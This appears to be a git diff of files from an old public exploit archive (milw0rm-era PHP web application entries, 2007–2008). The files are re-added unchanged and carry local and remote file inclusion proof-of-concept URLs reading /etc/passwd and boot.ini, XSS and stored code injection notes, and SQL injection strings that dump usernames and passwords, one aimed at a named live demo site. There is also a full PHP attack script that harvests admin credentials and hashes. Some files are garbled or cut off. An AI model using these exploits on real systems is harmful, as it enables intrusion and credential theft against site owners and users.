+Contact: admin[4t}bugreport{d0t]ir
+WwW.BugReport.ir
+WwW.AmnPardaz.com
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5871.txt b/platforms/php/webapps/5871.txt
index 5a8522b89..3fed66e58 100755
--- a/platforms/php/webapps/5871.txt
+++ b/platforms/php/webapps/5871.txt
@@ -1,28 +1,28 @@
-###################################################################################
-#
-#   Name   : FireAnt v1.3 Local File Inclusion Vulnerability
-#   Author : cOndemned
-#   Dork   : use Your brain (:
-#   Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
-#
-###################################################################################
-
-Source :
-
-    // index.php
-
-    8.      $page = "bug_list"; //default page
-    9.      if (!empty($_GET['page'])) {
-    10.         $page = strip_tags($_GET['page']);
-    
-    99.             if (file_exists("./".$page.".php")) { 
-    
-    104.                include("./".$page.".php"); 
-
-    
-Proof of Concept :
-
-    http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
-    http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00
-
-# milw0rm.com [2008-06-20]
+###################################################################################
+#
+#   Name   : FireAnt v1.3 Local File Inclusion Vulnerability
+#   Author : cOndemned
+#   Dork   : use Your brain (:
+#   Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
+#
+###################################################################################
+
+Source :
+
+    // index.php
+
+    8.      $page = "bug_list"; //default page
+    9.      if (!empty($_GET['page'])) {
+    10.         $page = strip_tags($_GET['page']);
+    
+    99.             if (file_exists("./".$page.".php")) { 
+    
+    104.                include("./".$page.".php"); 
+
+    
+Proof of Concept :
+
+    http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
+    http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5872.txt b/platforms/php/webapps/5872.txt
index 43a9dfc68..897e59a5e 100755
--- a/platforms/php/webapps/5872.txt
+++ b/platforms/php/webapps/5872.txt
@@ -1,31 +1,31 @@
-###################################################################################
-#
-#   Name   : FubarForum v1.5 Local File Inclusion Vulnerability
-#   Author : cOndemned
-#   Dork   : for ex. "Powered by FubarForum v1.5"
-#   Greetz : TBH, GregStar, ZaBeaTy, irk4z, Hawk, Sandtalker & Avantura ;*
-#
-###################################################################################
-
-Source :
-
-    // index.php
-
-    5.  if (!empty($_GET['page'])) { $page = $_GET['page']; }       // <---- $page is being sended using GET method
-
-    91. if (file_exists("./".$page.".php")) {       // <---- if only the file exists and we can use null byte (%00)
-    
-    98. include("./".$page.".php");                 // <---- our file will be included here :))
-    
-PoC :
-    
-    http://[host]/[fubarforum_path]/index.php?page=../../../../etc/passwd%00
-    http://[host]/[fubarforum_path]/index.php?page=../../../../[local_file]%00
-    
-###################################################################################
-#
-#   Together We stand tall, not gonna crash, not gonna fall - Children of Bodom
-#
-###################################################################################
-
-# milw0rm.com [2008-06-20]
+###################################################################################
+#
+#   Name   : FubarForum v1.5 Local File Inclusion Vulnerability
+#   Author : cOndemned
+#   Dork   : for ex. "Powered by FubarForum v1.5"
+#   Greetz : TBH, GregStar, ZaBeaTy, irk4z, Hawk, Sandtalker & Avantura ;*
+#
+###################################################################################
+
+Source :
+
+    // index.php
+
+    5.  if (!empty($_GET['page'])) { $page = $_GET['page']; }       // <---- $page is being sended using GET method
+
+    91. if (file_exists("./".$page.".php")) {       // <---- if only the file exists and we can use null byte (%00)
+    
+    98. include("./".$page.".php");                 // <---- our file will be included here :))
+    
+PoC :
+    
+    http://[host]/[fubarforum_path]/index.php?page=../../../../etc/passwd%00
+    http://[host]/[fubarforum_path]/index.php?page=../../../../[local_file]%00
+    
+###################################################################################
+#
+#   Together We stand tall, not gonna crash, not gonna fall - Children of Bodom
+#
+###################################################################################
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5873.txt b/platforms/php/webapps/5873.txt
index a2a324f33..08df52406 100755
--- a/platforms/php/webapps/5873.txt
+++ b/platforms/php/webapps/5873.txt
@@ -1,53 +1,53 @@
-  ____       _   _       _ ___   __                        _  __
- / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
-| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
-| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
- \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
----------------------------------------------------------------------------|___/
-Exploit found by sToRm
-
-
-LNP: Lightweight news Portal v1.0-BETA
-Multiple Remote Vulnerabilities
-
-
-Cross-Site Scripting
---------------------
-
-show_photo.php?photo=">
-show_potd.php?potd=">
-
-
-Insecure Administration
------------------------
-
-The admin page faces us with a login, but many important functions are allowed 
-to be executed without a logged-in session.
-
-admin.php?A=potd_delete
-admin.php?A=potd
-admin.php?A=vote_update
-admin.php?A=vote
-admin.php?A=modifynews
-
-
-Permanent Code Injection
-------------------------
-
-admin.php?A=vote
-
-"Current question" field allows for code injection, allowing us to force 
-all users browsing the poll to view an XSS or browser exploit. 
-
-
-File Upload
------------
-
-admin.php?A=potd
-
-The "picture of the day" manager allows for further images to be 
-uploaded, but does not check for image validity. Although a phpshell 
-cannot be executed through this method, a source may be uploaded for 
-inclusion in further attacks, possibly an LFI somewhere on the server. 
-
-# milw0rm.com [2008-06-20]
+  ____       _   _       _ ___   __                        _  __
+ / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
+| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
+| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
+ \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
+---------------------------------------------------------------------------|___/
+Exploit found by sToRm
+
+
+LNP: Lightweight news Portal v1.0-BETA
+Multiple Remote Vulnerabilities
+
+
+Cross-Site Scripting
+--------------------
+
+show_photo.php?photo=">
+show_potd.php?potd=">
+
+
+Insecure Administration
+-----------------------
+
+The admin page faces us with a login, but many important functions are allowed 
+to be executed without a logged-in session.
+
+admin.php?A=potd_delete
+admin.php?A=potd
+admin.php?A=vote_update
+admin.php?A=vote
+admin.php?A=modifynews
+
+
+Permanent Code Injection
+------------------------
+
+admin.php?A=vote
+
+"Current question" field allows for code injection, allowing us to force 
+all users browsing the poll to view an XSS or browser exploit. 
+
+
+File Upload
+-----------
+
+admin.php?A=potd
+
+The "picture of the day" manager allows for further images to be 
+uploaded, but does not check for image validity. Although a phpshell 
+cannot be executed through this method, a source may be uploaded for 
+inclusion in further attacks, possibly an LFI somewhere on the server. 
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5874.txt b/platforms/php/webapps/5874.txt
index 6e56ec95b..3d4998e3a 100755
--- a/platforms/php/webapps/5874.txt
+++ b/platforms/php/webapps/5874.txt
@@ -1,36 +1,36 @@
-  ____       _   _       _ ___   __                        _  __
- / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
-| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
-| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
- \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
----------------------------------------------------------------------------|___/
-Exploit found by sToRm
-
-IPTBB is a free forum system built using PHP and mysql.
-Local File Inclusion
-
-Local File Inclusion
---------------------
-
-index.php?act=../../../../../../etc/passwd%00
-
-
-function action($page){
-	$page="main/".$page.".php";
-	//Include the template maker
-	//Get the settings
-$setting = array();
-$sql = mysql_query(" SELECT * FROM `iptbb_settings` ");
-
-while ( $row = mysql_fetch_array( $sql ) ){
-	$setting["{$row['name']}"] = $row['value'];
-}
-
-	require_once('tpl.class.php');
-	$tpl = new template;
-	$fileurl = 'templates/';
-	$template = $setting['template'] . '/';
-	include($page);
-}
-
-# milw0rm.com [2008-06-20]
+  ____       _   _       _ ___   __                        _  __
+ / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
+| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
+| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
+ \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
+---------------------------------------------------------------------------|___/
+Exploit found by sToRm
+
+IPTBB is a free forum system built using PHP and mysql.
+Local File Inclusion
+
+Local File Inclusion
+--------------------
+
+index.php?act=../../../../../../etc/passwd%00
+
+
+function action($page){
+	$page="main/".$page.".php";
+	//Include the template maker
+	//Get the settings
+$setting = array();
+$sql = mysql_query(" SELECT * FROM `iptbb_settings` ");
+
+while ( $row = mysql_fetch_array( $sql ) ){
+	$setting["{$row['name']}"] = $row['value'];
+}
+
+	require_once('tpl.class.php');
+	$tpl = new template;
+	$fileurl = 'templates/';
+	$template = $setting['template'] . '/';
+	include($page);
+}
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5875.txt b/platforms/php/webapps/5875.txt
index 547f8da58..fd2c128e4 100755
--- a/platforms/php/webapps/5875.txt
+++ b/platforms/php/webapps/5875.txt
@@ -1,50 +1,50 @@
-#########################################################################
-#################### Viva IslaM Viva IslaM ##############################
-##
-## Remote SQL Injection Vulnerability
-##
-## CiBlog 3.1 ( links-extern.php id )
-##
-#########################################################################
-#########################################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
-##
-## Email  : SQL@Hotmail.it
-##
-## !! SYRIAN HaCkErS  !!
-########################
-########################
-##
-## Script  : CiBlog  3.1
-##
-## site    : www.cistyle.de
-##
-########################
-########################
-##
-##     -(:: SQL ::)-
-##
-##    www.site.com/
-##         links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*
-##
-##  -(:: L!VE DEMO ::)-
-##
-##    http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*
-##
-#######################
-#######################
-
-
-#######################################################################################################
-#######################################################################################################
-
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-06-20]
+#########################################################################
+#################### Viva IslaM Viva IslaM ##############################
+##
+## Remote SQL Injection Vulnerability
+##
+## CiBlog 3.1 ( links-extern.php id )
+##
+#########################################################################
+#########################################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
+##
+## Email  : SQL@Hotmail.it
+##
+## !! SYRIAN HaCkErS  !!
+########################
+########################
+##
+## Script  : CiBlog  3.1
+##
+## site    : www.cistyle.de
+##
+########################
+########################
+##
+##     -(:: SQL ::)-
+##
+##    www.site.com/
+##         links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*
+##
+##  -(:: L!VE DEMO ::)-
+##
+##    http://www.cistyle.de/demo/links-extern.php?id=-2+union+select+1,concat_ws(0x3a,user,password),1,1,1,1+from+user/*
+##
+#######################
+#######################
+
+
+#######################################################################################################
+#######################################################################################################
+
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5876.txt b/platforms/php/webapps/5876.txt
index 11ec3f5b1..af6f95803 100755
--- a/platforms/php/webapps/5876.txt
+++ b/platforms/php/webapps/5876.txt
@@ -1,18 +1,18 @@
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-Scripts         : CMS Jamroom Version: 3.3.5
-Discovered By   : Cyberlog
-Scripts site    : http://www.jamroom.net/
-Download Script : http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43
-Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
-Special To      : k1n9k0ng, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee
-                  letjen, k1tk4t, inouf and jayoes
-Site            : www.sekuritionline.net
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-bug Script:
-require_once("{$jamroom['jm_dir']}/include/jamroom-payment.inc.php");
-
-Bug Found:
-http://www.site.com/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=[shell]
-
-# milw0rm.com [2008-06-20]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Scripts         : CMS Jamroom Version: 3.3.5
+Discovered By   : Cyberlog
+Scripts site    : http://www.jamroom.net/
+Download Script : http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43
+Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
+Special To      : k1n9k0ng, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee
+                  letjen, k1tk4t, inouf and jayoes
+Site            : www.sekuritionline.net
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+bug Script:
+require_once("{$jamroom['jm_dir']}/include/jamroom-payment.inc.php");
+
+Bug Found:
+http://www.site.com/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=[shell]
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5877.txt b/platforms/php/webapps/5877.txt
index a71eb8453..0649418e4 100755
--- a/platforms/php/webapps/5877.txt
+++ b/platforms/php/webapps/5877.txt
@@ -1,81 +1,81 @@
-===============================================================
-  JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
-===============================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 20 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : JaxUltraBB
- VERSION     : <= 2.0
- DOWNLOAD    : http://downloads.sourceforge.net/jubb/
-#####################################################
-
---- Local File Inclusion ---
-
------------------------------------
- Vulnerable File [viewprofile.php]
------------------------------------
-@Line 8-9
-
-   8: $userfile = file_get_contents("users/".$_GET['user'].".JaxSQL");
-   9: $onlinefile = file_get_contents("users/".$_GET['user']."online.JaxSQL");
-
---------------
- POC Exploits
---------------
-
-[+] http://192.168.24.25/jubb/viewprofile.php?user=../../../../../../../../boot.ini%00
-
-
-    This exploit will open boot.ini in system file:
-
-[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
-
-    You can change boot.ini to /etc/passwd%00 in linux OS.
-
-
---- Remote XSS Exploit ---
-
----------------------------------
- Vulnerable File [viewforum.php]
----------------------------------
-
-@Line 
-
-  14: $forum = $_GET['forum'];
-
-  15: online_moved("Viewing ".$_GET['forum']);
-
-  17: $forumfile = fopen("topics/".$forum."topics.JaxSQL", "at");
-  18: $topicsfile = file_get_contents("topics/".$forum."topics.JaxSQL", "at");
-  19: echo "


    REQUEST TIMERESPONSE TIMETRUETIMEBENCHMARKRESULTIPFIELDCHARSETSUBSTR()ORD()CHAR() ".htmlentities($bef)."  ".htmlentities($aft)."  ".htmlentities($truetime)."  ".htmlentities($benchmark)."  ".htmlentities($result)."  ".htmlentities($fakeip)."  ".htmlentities($dafield)."  ".htmlentities("$a-$b")."  ".htmlentities($sub)."  ".htmlentities($f)."  ".htmlentities(chr($f))." 
    ",$temp[1]);
+		$imageid=$temp2[0];
+
+		echo "\r\n[+] Image ID Retrieved..." . $imageid . "!\n";}
+
+	else{echo "\r\n[-] Cannot retrieve a valid image ID...\n"; footer(); exit;}
+
+
+    $data="comments=Your+about+to+get+owned%21";
+    $data.="&do=comment";
+    $data.="&commentid=";
+    $packet ="POST " . $p . "viewimage.php?imageid=" . $imageid . " HTTP/1.1\r\n";
+    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+    $packet.="Host: ".$host."\r\n";
+    $packet.="Content-Length: ".strlen($data)."\r\n";
+    $packet.="Cookie: " . $cookie . "\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    $packet.=$data;
+
+    sendpacketii($packet);
+
+    if (strstr($html,"Comments posted successfully!")){echo "[+] Posting comment...Done!\n";}
+    else{echo "[-] Posting comment...Failed!\n"; footer(); exit;} 
+
+    $sqlArray = array(
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*"
+);
+
+for ($i=0; $i<=count($sqlArray); $i++){
+
+    $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n";
+    $packet.="Host: " . $host . "\r\n";
+    $packet.="Cookie: " . $cookie . "\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    sendpacketii($packet);
+
+    if (strstr($html,"name=\"comments\">Username=")){
+	    	$temp3=explode("id=\"comments\" name=\"comments\">Username=",$html);
+    		$temp4=explode(":",$temp3[1]);
+		$ret_user=$temp4[0];
+
+		echo "\r\n[+] Admin User: " . $ret_user;}
+
+    
+	elseif (strstr($html,"404")){
+			echo "\r\n[-] Image ID is not valid, please try another!"; footer(); exit;}
+    else{} 
+}
+
+    $sqlArray = array(
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,54),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,55),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,56),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(49,57),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,48),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,49),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,50),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*",
+"viewimage.php?imageid=$imageid&commentspage=1&editcomment=999/**/UNION/**/SELECT/**/0,0,CHAR(50,51),0,0,CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),password)/**/FROM/**/pg_users/**/where/**/userid=14/*"
+);
+
+for ($i=0; $i<=count($sqlArray); $i++){
+
+    $packet ="GET " . $p . $sqlArray[$i] . " HTTP/1.1\r\n";
+    $packet.="Host: " . $host . "\r\n";
+    $packet.="Cookie: " . $cookie . "\r\n";
+    $packet.="Connection: Close\r\n\r\n";
+    sendpacketii($packet);
+
+    if (strstr($html,":Hash=")){
+	    	$temp3=explode("Hash=",$html);
+    		$temp4=explode("</textarea>",$temp3[1]);
+		$ret_hash=$temp4[0];
+
+		echo "\r\n[+] Admin User: " . $ret_hash . "\n";}
+    else{} 
+}
+
+footer();
+
+?>
+
+# milw0rm.com [2007-06-01]
diff --git a/platforms/php/webapps/4022.htm b/platforms/php/webapps/4022.htm
index 26b9b2606..90b72afcc 100755
--- a/platforms/php/webapps/4022.htm
+++ b/platforms/php/webapps/4022.htm
@@ -1,83 +1,83 @@
-
-
-
-XOOPS Module icontent v.1.0 Remote File Inclusion Exploit
-
-
-
-
-
-
-
    
-
-
    XOOPS Module icontent 
-v.1.0 Remote File Inclusion Exploit
    
-
-
    
-
-    Target:[http://[target]/[scriptpath]
-   
-  
    
-  
    
-
-

    
-
-
    
-
-Mahmood_ali
    
-
-TrYaG-Team
    
-
    
-
    
-
-
-
-
-# milw0rm.com [2007-06-01]
+
+
+
+XOOPS Module icontent v.1.0 Remote File Inclusion Exploit
+
+
+
+
+
+
+
    
+
+
    XOOPS Module icontent 
+v.1.0 Remote File Inclusion Exploit
    
+
+
    
+
    
+    Target:[http://[target]/[scriptpath]
+   
+  
    
+  
    
+
    
+

    
+
+
    
+
+Mahmood_ali
    
+
+TrYaG-Team
    
+
    
+
    
+
+
+
+
+# milw0rm.com [2007-06-01]
diff --git a/platforms/php/webapps/4025.php b/platforms/php/webapps/4025.php
index 51bd763ea..422689c5d 100755
--- a/platforms/php/webapps/4025.php
+++ b/platforms/php/webapps/4025.php
@@ -1,374 +1,374 @@
- 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-
-function wyslijpakiet($pakiet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$pakiet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-}
-$host=$argv[1];
-$path=$argv[2];
-$port=80;
-$proxy="";
-$login="admin";
-$haslo="admin";
-$cmd="";
-for ($i=3; $i<$argc; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>'-p') and ($temp<>'-P')) {$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-if ($temp=="-L")
-{
-  $login=str_replace("-L","",$argv[$i]);
-}
-if ($temp=="-H")
-{
-  $haslo=str_replace("-H","",$argv[$i]);
-}
-}
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'bad patch!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-/*
-how its works :)
-
-in file "config/general.php" lines 12-33:
-
-################################################################################
-$config['dir_config']           = 'config/';
-$config['dir_core']             = 'core/';
-$config['dir_db']               = 'db/';
-$config['dir_js']               = 'js/';
-$config['dir_libraries']        = 'libraries/';
-$config['dir_tpl']              = 'templates/';
-$config['dir_files']            = 'files/';
-$config['dir_ext']              = 'ext/';
-$config['dir_plugins']          = 'plugins/';
-$config['dir_lang']             = 'lang/';
-
